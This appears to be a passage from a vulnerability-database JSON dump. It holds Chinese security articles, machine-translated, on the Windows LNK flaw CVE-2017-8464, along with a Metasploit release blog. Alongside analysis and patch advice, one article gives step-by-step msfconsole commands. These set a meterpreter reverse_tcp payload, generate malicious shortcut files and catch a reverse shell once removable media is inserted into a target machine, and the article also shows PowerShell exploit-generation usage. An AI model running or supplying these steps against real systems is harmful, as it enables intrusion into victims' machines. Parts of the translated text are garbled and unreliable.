of the two Block. PoC File format figure in the second row of numbers 81, The representative is the LNK file header of the LinkFlags field, 81 is the meaning of the LNK file contains a LinkTargetIDList, and string using Unicode encoding. 
In LinkTargetIDList followed by is the extradata property, the present vulnerability is SpecialFolderDataBlock it. \nLinkTargetIDList format the following figure \nThe PoC contains 3 item, wherein the item 2 containing the trigger the vulnerability after the automatic execution of the malicious DLL file path: \n! [](/Article/UploadPic/2017-8/201789195027452. jpg? www. myhack58. com) \nPoC IDListSize is 0x8E, which has 3 item, the first item The size is 0\u00d714, and the second item The size is 0\u00d714, and the third item The size is 0\u00d764 in. \nLinkTargetIDList included in the Item format is as follows: \n! [](/Article/UploadPic/2017-8/201789195027566. jpg? www. myhack58. com) \nThe extradata property format the following figure \nThe vulnerability used is SpecialFolderDataBlock: the \n! [](/Article/UploadPic/2017-8/201789195027884. jpg? www. myhack58. com) \nTo understand the Complete file formats, vulnerability principle not very complicated: finished parsing LinkTargetIDList after parsing SpecialFolderDataBlock, parsing SpecialFolderDataBlock process CShellLink::_DecodeSpecialFolder will according to which the offset 0\u00d728 to find the front of the item 2, and will be one of the DLLload into memory to perform one of the DllMain. Due to this parsing process is in the explorer. exe in the implementation, so the corresponding load into memory a malicious DLL also has the same high permissions is generally High in. \nThe figure below is the PoC exploit is triggered when the call stack, as well as vulnerability after the implementation will load the malicious DLL into memory: \n! [](/Article/UploadPic/2017-8/201789195027956. jpg? www. myhack58. com) \n! [](/Article/UploadPic/2017-8/201789195027572. jpg? www. myhack58. com) \nPatch comparison: \n! [](/Article/UploadPic/2017-8/201789195027161. jpg? www. myhack58. 
com) \nIn the patch, Microsoft validates the DLL path by calling the _IsRegisteredCPLApplet function; if that validation fails, CPL_LoadCPLModule is no longer called. \nHanSight solutions \nHanSight Enterprise correlates host logs to summarize the behaviour common to Stuxnet-style exploitation of this vulnerability, including USB drive insertion events and host process behaviour, so that such activity can be detected and an alarm raised: \n! [](/Article/UploadPic/2017-8/201789195027690. png? www. myhack58. com) \nPrevention policy recommendations \n1\\. Use HanSight Enterprise to monitor host behaviour so that alerts are raised in time for investigation. \n2\\. Apply Windows operating system patches: \nhttps://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464 \nReferences \n1\\. Metasploit \n2\\. Shell Link (.LNK) file format: \nhttps://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK].pdf \n\n", "modified": "2017-08-09T00:00:00", "published": "2017-08-09T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/88476.htm", "id": "MYHACK58:62201788476", "title": "\u201cThe seismic network of the third generation\u201dCVE-2017-8464 vulnerability analysis and early warning-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-06T22:18:09", "bulletinFamily": "info", "cvelist": ["CVE-2017-8464", "CVE-2010-2568", "CVE-2015-0096"], "edition": 1, "description": "As early as June 13, Microsoft released a patch for the vulnerability numbered CVE-2017-8464: a local user or a remote attacker can exploit it with a specially crafted shortcut file, delivered via a removable device or a remote share, to achieve remote code execution. Looking back, the NSA is acknowledged to have used similar vulnerabilities in the Stuxnet virus, developed under the code name \u201cOlympic Games\u201d, to 
prevent Iran from developing nuclear weapons. \nVersions affected by CVE-2017-8464: \nWindows 7 \nWindows 8.1 \nWindows RT 8.1 \nWindows 10 \nWindows Server 2008 \nWindows Server 2008 R2 \nWindows Server 2012 \nWindows Server 2012 R2 \nWindows Server 2016 \nUsage \n1) Using CVE-2017-8464 in Metasploit-Framework \n1. First download the latest zip package\u3010download\u3011. After the download completes, copy cve_2017_8464_lnk_rce.rb from modules/exploits/windows/fileformat inside the archive to the directory /usr/share/metasploit-framework/modules/exploits/windows/fileformat. \n2. Copying only the rb file produces an error; the cve-2017-8464 folder from data/exploits inside the archive must also be copied to /usr/share/metasploit-framework/data/exploits. \n3. Open a terminal: \nmsfconsole \nuse exploit/windows/fileformat/cve_2017_8464_lnk_rce \nset PAYLOAD windows/meterpreter/reverse_tcp \nset LHOST [your IP address] \nTrojan \n![](/Article/UploadPic/2017-8/20178711814896.png?www.myhack58.com) \n![](/Article/UploadPic/2017-8/20178711814375.png?www.myhack58.com) \nThe files we want are then generated under /root/.msf4/local; so many are generated because they correspond to the drive letters, with none left out. \n4. Continue entering commands: \nuse multi/handler \nset PAYLOAD windows/meterpreter/reverse_tcp \nset LHOST [your IP address] \nrun \n5. Insert the removable disk into the target machine; if AutoPlay is enabled on the target, a reverse connection is received when the user chooses to browse the files. \n![](/Article/UploadPic/2017-8/20178711814631.png?www.myhack58.com) \nDemo: \n![](/Article/UploadPic/2017-8/20178711814509.gif?www.myhack58.com) \n2) PowerShell \nThis PowerShell method differs from the CVE-2017-8464 reproduction method that circulated online earlier. \nFirst download Export-LNKPwn.ps1\u3010Click here\u3011 \nNotes: \n- Requires .NET library version 4.0 or above; the author used a number of constructors, such as new(), that exist only in PowerShell 5.0. He plans to lower the version requirement to .NET 3.5 and PowerShell 2.0 so that the module can be loaded into memory in every target environment. \n- The author wants to extend the functionality so that users can generate the original Stuxnet LNK exploit (CVE-2010-2568) and address the bypass issue of CVE-2015-0096. \n- Antivirus products will handle your LNK file, so be prepared for that. \nParameter description: \nLNKOutPath: full local path where the LNK file is saved. \nTargetCPLPath: full local/remote path of the target CPL. \nType: the FolderDataBlock type to use, either \u201cSpecialFolderDataBlock\u201d or \u201cKnownFolderDataBlock\u201d. \nExamples of use: \nC:\\PS> Export-LNKPwn -LNKOutPath C:\\Some\\Local\\Path.lnk -TargetCPLPath C:\\Target\\CPL\\Path.cpl -Type SpecialFolderDataBlock \nC:\\PS> Export-LNKPwn -LNKOutPath C:\\Some\\Local\\Path.lnk -TargetCPLPath C:\\Target\\CPL\\Path.cpl -Type KnownFolderDataBlock \n\n", "modified": "2017-08-07T00:00:00", "published": "2017-08-07T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/88412.htm", "id": "MYHACK58:62201788412", "title": "\u201cStuxnet Third Generation\u201d (CVE-2017-8464): several exploitation methods and prevention - vulnerability and early warning - Heiba Security Net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "rapid7blog": [{"lastseen": "2021-01-30T00:48:42", "bulletinFamily": "info", "cvelist": ["CVE-2010-2568", "CVE-2018-9276", "CVE-2020-11853", "CVE-2020-11854", "CVE-2020-15505", "CVE-2020-28949"], "description": "## MobileIron MDM Hessian-Based Java Deserialization RCE\n\nOur very own [wvu-r7](<https://github.com/wvu-r7>) has added `exploits/linux/http/mobileiron_mdm_hessian_rce`, which exploits an ACL bypass in MobileIron MDM products to execute a 
Java deserialization attack using a Groovy gadget against a Hessian-based endpoint ([CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505?referrer=blog>)). MDM helps organizations manage and control all employees' devices, requiring it to be publicly reachable to synchronize devices, making this an appealing target. This exploit has been included on the U.S. National Security Agency's list of vulnerabilities known to be exploited by Chinese state-sponsored threat actors. More information about this exploit can be found [here](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505?referrer=blog#rapid7-analysis>).\n\n## PEAR Archive_Tar < 1.4.11 Arbitrary File Write\n\n`exploits/multi/fileformat/archive_tar_arb_file_write` has been added by [gwillcox-r7](<https://github.com/gwillcox-r7>), which adds support for [CVE-2020-28949](<https://attackerkb.com/topics/gLmKfmD9Dl/cve-2020-28949?referrer=blog>). CVE-2020-28949 is a vulnerability which affects the Archive_Tar plugin of the PEAR PHP development framework and is caused by Archive_Tar\u2019s lack of validation of file stream wrappers contained within filenames, which allows the writing of an arbitrary file containing user-controlled content to an arbitrary location on disk.\n\n## Micro Focus UCMDB Java Deserialization Unauthenticated Remote Code Execution\n\nCommunity contributor [Pedro Ribeiro](<https://github.com/pedrib>) has added `exploits/multi/http/microfocus_ucmdb_unauth_deser`, which exploits two vulnerabilities, [CVE-2020-11853](<https://attackerkb.com/topics/KTzvjJFDS8/cve-2020-11853?referrer=blog>) and [CVE-2020-11854](<https://attackerkb.com/topics/sQf6eBCrAZ/cve-2020-11854?referrer=blog>), that when chained allow an attacker to achieve unauthenticated remote code execution in Micro Focus UCMDB. CVE-2020-11854 is the use of a hardcoded password for the "diagnostics" user, which allows attackers to log into UCMDB. 
CVE-2020-11853 takes advantage of the fact that after authentication, almost all of the UCMDB client\u2019s communication is done using Java serialized objects, allowing an authenticated attacker to inject a malicious Java serialized object into a POST body to one of the vulnerable endpoints to achieve remote code execution as root or SYSTEM.\n\n## New modules (5)\n\n * [MobileIron MDM Hessian-Based Java Deserialization RCE](<https://github.com/rapid7/metasploit-framework/pull/14645>) by wvu, Orange Tsai, iamnoooob, and rootxharsh, which exploits [CVE-2020-15505](<https://attackerkb.com/topics/Mo2aQDjmZ2/cve-2020-15505?referrer=blog>)\n * [PEAR Archive_Tar < 1.4.11 Arbitrary File Write](<https://github.com/rapid7/metasploit-framework/pull/14618>) by gwillcox-r7 and xorathustra, which exploits [CVE-2020-28949](<https://attackerkb.com/topics/gLmKfmD9Dl/cve-2020-28949?referrer=blog>)\n * [Micro Focus UCMDB Java Deserialization Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14654>) by Pedro Ribeiro, which exploits [CVE-2020-11853](<https://attackerkb.com/topics/KTzvjJFDS8/cve-2020-11853?referrer=blog>)\n * [PRTG Network Monitor Authenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/14627>) by Josh Berry and Julien Bedel, which exploits [CVE-2018-9276](<https://attackerkb.com/topics/exAxAsJV7d/cve-2018-9276?referrer=blog>)\n * [FannyBMP or DementiaWheel Detection Registry Check](<https://github.com/rapid7/metasploit-framework/pull/14541>) by William M., which does a Registry check for the presence of [CVE-2010-2568](<https://attackerkb.com/topics/nffaTD2h9a/cve-2010-2568?referrer=blog>)\n\n## Enhancements and features\n\n * [PR #14383](<https://github.com/rapid7/metasploit-framework/pull/14383>) by [h00die](<https://github.com/h00die>) added two new external module examples in Python, one as an exploit module example and the other as an auxiliary example.\n * [PR 
#14651](<https://github.com/rapid7/metasploit-framework/pull/14651>) by [bcoles](<https://github.com/bcoles>) updates msftidy to verify that all modules have a module description.\n * [PR #14564](<https://github.com/rapid7/metasploit-framework/pull/14564>) by [adfoster-r7](<https://github.com/adfoster-r7>) updates internal Metasploit libraries to dependency-inject the currently active module when performing tab completion for users.\n * [PR #14432](<https://github.com/rapid7/metasploit-framework/pull/14432>) by [cn-kali-team](<https://github.com/cn-kali-team>) adds a new function `report_creds` to the `kiwi.rb` and `priv/password.rb` Meterpreter libraries. This function ensures that credentials dumped via Kiwi or via the `hashdump` command are now appropriately captured in the `creds` database, allowing users to replay them later on, or attempt to crack them and obtain the plaintext password.\n\n## Bugs fixed\n\n * [PR #14664](<https://github.com/rapid7/metasploit-framework/pull/14664>) by [s1e2b3i4](<https://github.com/s1e2b3i4>) applies a fix to `auxiliary/scanner/ssh/ssh_enumusers.rb` to ensure that error messages that occur when a user does not exist on the target system, or cannot connect remotely, are not displayed unless the VERBOSE flag is set.\n * [PR #14657](<https://github.com/rapid7/metasploit-framework/pull/14657>) by [jmartin-r7](<https://github.com/jmartin-r7>) updates Metasploit's docker build process to download pip from an alternative GitHub download source now that python2 will no longer be available after January 30th 2021.\n * [PR #14650](<https://github.com/rapid7/metasploit-framework/pull/14650>) by [bcoles](<https://github.com/bcoles>) updates `local_exploit_suggester` to correctly store rhost information in the database, as previously this would crash.\n * [PR #14647](<https://github.com/rapid7/metasploit-framework/pull/14647>) by [zeroSteiner](<https://github.com/zeroSteiner>) addresses a typo introduced in 
[#14582](<https://github.com/rapid7/metasploit-framework/pull/14582>) whereby a non-existent value was used to populate the tab completion array for the run command of modules that support actions as commands, resulting in msfconsole crashing when tab completion was attempted. Users should now be able to do tab completion using the run command without errors.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.27...6.0.28](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-01-21T12%3A45%3A57-06%3A00..2021-01-28T13%3A25%3A20-06%3A00%22>)\n * [Full diff 6.0.27...6.0.28](<https://github.com/rapid7/metasploit-framework/compare/6.0.27...6.0.28>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-01-29T21:09:49", "published": "2021-01-29T21:09:49", "id": "RAPID7BLOG:B65D62B8E1AD22C908D33D641FD0A55E", "href": "https://blog.rapid7.com/2021/01/29/metasploit-wrap-up-96/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}